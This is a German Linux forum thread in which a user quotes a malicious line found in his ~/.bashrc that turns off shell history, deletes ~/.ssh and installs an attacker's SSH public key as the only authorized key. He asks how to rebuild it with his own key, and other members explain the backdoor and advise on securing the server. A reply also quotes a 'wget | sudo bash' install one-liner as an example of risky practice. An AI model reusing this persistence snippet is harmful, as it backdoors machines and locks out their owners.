Sicherheit durch Rsa im bashrc?

[swiftcoding]

Hey, ich bin ein wenig verwirrt & ehrlich gesagt nicht sicher ob ich im richtig Thread bin. :p

Ich hatte einen kleinen Viren-Vorfall.. nun ja und dabei entdeckte ich sowas hier..

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

im ~./bashrc

Meine Frage nun, wie konstruiere ich das nach?
Ich habe es mal genau so mit meinem pubkey probiert, aber es funktioniert nicht..

Hat jemand Ideen?
Danke euch

[DeletedUserReAsG]

Das Script löscht beim Ausführen (und .bashrc wird bei jedem Login ausgeführt, sofern die Bash genutzt wird) ~/.shh/, legt es anschließend wieder an, schreibt den mitgegebenen öffentlichen Schlüssel als Einzigen in die authorized_keys und setzt anschließend die Rechte wieder richtig. Anschließend kann sich der Besitzer des dazugehörigen privaten Teils des gegebenen Schlüssels via ssh auf der Kiste einloggen.

Was genau möchtest du da nachkonstruieren? „Funktioniert nicht“ steht hier wofür genau?

[swiftcoding]

Hey.

Danke dafür erstmal.
Naja, so wurde ich halt aus meinem System ausgeschlossen. - Fand ich zwar nicht so prickelnd, aber schätzungsweise gibt das eine recht hohe Sicherheit, denke ich mal.
Ich würde es gerne mal probiere, aber natürlich mit meinem key.

Ich hatte versucht es einfach mal in die Datei ~/.bashrc ei zufügen, aber dabei passierte nichts. - Der Passwort login funktionierte wie gewohnt & der Schlüssel war völlig irrelevant.
Also denke ich mal dass ich irgendwas falsch gemacht habe oder vergessen habe.

[Livingston]

Reden wir hier von einem öffentlich zugänglichen Server?
Wenn Du darauf einen "kleinen Viren-Vorfall" hattest, dann hast Du den natürlich komplett geputzt und neu aufgesetzt, nicht wahr?
Und jetzt möchtest Du lernen, wie man darauf ssh einrichtet. Habe ich das richtig verstanden?

[thoerb]

Und jetzt möchtest Du lernen, wie man darauf ssh einrichtet. Habe ich das richtig verstanden?

Soweit ich das verstanden habe, möchte er sich jetzt selbst noch mal mit dem vorhandenen Schadcode aus seinem eigenem System ausschließen. Aber das klappt nicht so richtig.

[swiftcoding]

Genau, System wurde komplett neu aufgesetzt.

Und ich möchte quasi diesen Zustand den der Virus verursacht hat wiederherstellen, aber eben nicht mit einem Fremden key sondern mit meinem.

Und da es vorher im bashrc war, dachte ich ich könne dies einfach da rein klatschen.. aber das funktioniert nicht so ganz..

Danke euch!

(sorry falls ich mich blöd anstelle, bin neu auf Unixsystemen.. )

Eventuell noch ergänzend,
dieser Schadcode hat bewirkt dass ich mich
- nicht mehr per SSH mit password anmelden konnte,
- und nicht mehr mit meinem alten key rein kam.

[swiftcoding]

Und jetzt möchtest Du lernen, wie man darauf ssh einrichtet. Habe ich das richtig verstanden?

Soweit ich das verstanden habe, möchte er sich jetzt selbst noch mal mit dem vorhandenen Schadcode aus seinem eigenem System ausschließen. Aber das klappt nicht so richtig.

Quasi, aber ich möchte natürlich meinen key darin setzen, so dass ich mich nicht aussperre.

[Livingston]

Die dringendste Frage ist, wie sich der Angreifer seinen ersten Zugang verschaffte. Offensichtlich hat er sich - nachdem das gelungen ist - einen User-Account namens "user" gebaut, denn:

Code: Alles auswählen

export PATH=/home/user/.bin:$PATH

Dann erfolgte das Einschleusen des Scriptes, womit er letztendlich seinen Pubkey in /home/user/.ssh/authorized_keys deponiert.
Sofern sshd noch nicht installiert war, hat er es installieren müssen und mit root-Rechten die zentrale Datei /etc/ssh/sshd_config auf pubkey-Zugriff geändert.
Ab diesem Moment war kein Hack mehr nötig und er konnte sich "regulär" als User namens "user" mit seinem key einloggen.

Du kannst davon ausgehen, dass er noch weitere Werkzeuge unter /home/user/.bin installiert hatte.
Die wichtigste Frage ist jedoch, wie ihm der ursprüngliche Einbruch gelang und wie er danach an root-Rechte kam. Die Veränderung der .bashrc diente lediglich dazu, sich den zukünftigen Zugang bequem abzusichern.

Nix für ungut, aber ich glaube, Du solltest erst mal gründlich pauken, wie man einen öffentlich zugänglichen Rechner abdichtet und ssh sicher konfiguriert. Dann verstehst Du auch das Script.
Weiter mag ich Dich hier nicht unterstützen, denn um einen öffentlichen Server oder ähnliches zu managen, muss man erst mal die Basics lernen, und hier "mal eben" 'nen Crashkurs geben, würde mich ein wenig überfordern.

[swiftcoding]

Hey,grundsätzlich handelt es sich dabei nur um einen Testserver.
Dieser war bis dato keines Wegs abgesichert, der Zugang entstand höchstwahrscheinlich durch eine Datei die ich kurz zuvor heruntergeladen habe..(ich war etwas unachtsam an der Stelle..)
Die Root-Rechte erhielt er natürlich da er sich direkt Zugriff zum Rootuser besorgt hat, da dies der einzige Nutzer zu dem Zeitpunkt war.

[Livingston]

Testen finde ich ja gut, aber denk bitte daran, dass ein übernommener Rechner als Sprungbrett für Sauereien aller Art dient. Deshalb würde ich Trockenübungen erst mal in einer virtuellen Kiste machen oder auf einem Rechner, dem Du den Zugang in die große, weite Welt versperren kannst.

Nur mal ein paar Sachen, die mir so einfallen:
- Auf einen Server "irgendwas aus dem Netz laden" und dann starten, macht man ganz einfach nicht. Würd ich noch nicht mal auf meinem Arbeitsrechner zuhause machen, sondern allenfalls in einer VM.
- "Rootuser"... Altes Thema. Wahrscheinlich hast Du bei der Installation die verlockende Option gewählt, den ersten User mit allen Rechten zu versehen (weiß grad nicht, wie die Option heißt). Damit hast Du dann die Unsitte zugelassen, dass Du mit sudo bash root-Rechte bekommst. Und genau deshalb gehört sowas no, ney, never auf einen Server... Du siehst ja jetzt selbst, warum

Langer Rede, kurzer Sinn: Bei Neueinrichtung erst mal oben genannte Fehler vermeiden und dann ssh sauber einrichten. Schnapp Dir die Forensuche und die Suchmaschine Deiner Wahl und hau da mal ssh und public key rein. Es gibt eine Unmenge guter Anleitungen dazu. Sorry, aber da musst Du wohl einfach mal durch.

[MSfree]

- Auf einen Server "irgendwas aus dem Netz laden" und dann starten, macht man ganz einfach nicht.

Nunja, im Prinzip gebe ich dir Recht. Wenn man schon Skripte runterlädt, sollte man die auf jeden Fall in einem Editor inspizieren und erst dann, wenn man es für gut befunden hat, ausführen.

Das ist aber zugegeben für die meisten Benutzer zuviel erwartet, weil kaum jemand den Skriptsyntax versteht und bei entsprechen langen Skripten auch sehr zeitaufwändig ist.

Nur mal ein seriöses (?) Beispiel, das man im Netz zur Installation von Openmediavault auf einem Raspi findet:

Code: Alles auswählen

wget -O - https://raw.githubusercontent.com/OpenMediaVault-Plugin-Developers/installScript/master/install | sudo bash

Tja, man spart sich hat die Erklärung, warum man das Skript erstmal runterladen und instpizieren sollte, es dann ggfls. ausführbar machen muß und dann erst starten sollten. Man will vermeiden, Neulingen etwas erklären zu müssen, was sie sowieso nicht verstehen würden.

[swiftcoding]

Die Sache ist die, ich habe mir kein script runtergeladen..
ich hatte mir etwas für apt-get geholt..dies funktionierte nicht,also habe ich es sofortig deinstalliert.
Kurz darauf stellte ich dann das Problem fest.

[wanne]

Wie schon angemerkt. Das Skript löscht beim starten der bash. Also üblicherweise wenn du eine neue Konsole aufmachst. Alle keys und ersetzt sie durch eigene. Das Passwort bleibt von der Zeile unberührt. Du solltest dich also lediglich zusätzlich zum Passwort mit dem Key anmelden können und das erst nachedm du das erste mal eine neue konsole gestartet hast.
Man kann aber sehen, dass er in .bin noch anderes Zeug abgelegt hat, das eventuell noch anderes Zeug macht.

btw. sooo plumpe Malware habe ich schon ein paar Jahre nicht mehr gesehen. Sicher dass das nicht irgend ein bekannter hinterlegt hat.

[swiftcoding]

Lediglich Ich, als auch der Host (großes Seriöses Unternehmen) hatten Zugriff drauf, also offiziell, demnach schließe ich einen Bekannten aus.

[thoerb]

ich hatte mir etwas für apt-get geholt..dies funktionierte nicht,also habe ich es sofortig deinstalliert.
Kurz darauf stellte ich dann das Problem fest.

Was genau meinst du mit: "ich hatte mir etwas für apt-get geholt.." ?

Ich glaube nicht, dass du das Script aus den Debian-Quellen installiert hast.

[swiftcoding]

Ups, Fehler.

[swiftcoding]

Das bezweifle ich auch ganz stark, jedoch hatte ich nichts anderes gemacht gehabt. Die Anwendung sei angeblich für den FTP-Dienst gewesen, funktionierte jedoch nicht.

Weitere Sachen die ich zu diesem Zeitpunkt auf dem Server installiert hatte war apache2 , MariaDB und Wordpress.
Jedoch habe ich nichts davon als fertiges script oder co installiert sondern jeden Befehl eigenständig rausgeknobelt und eingegeben.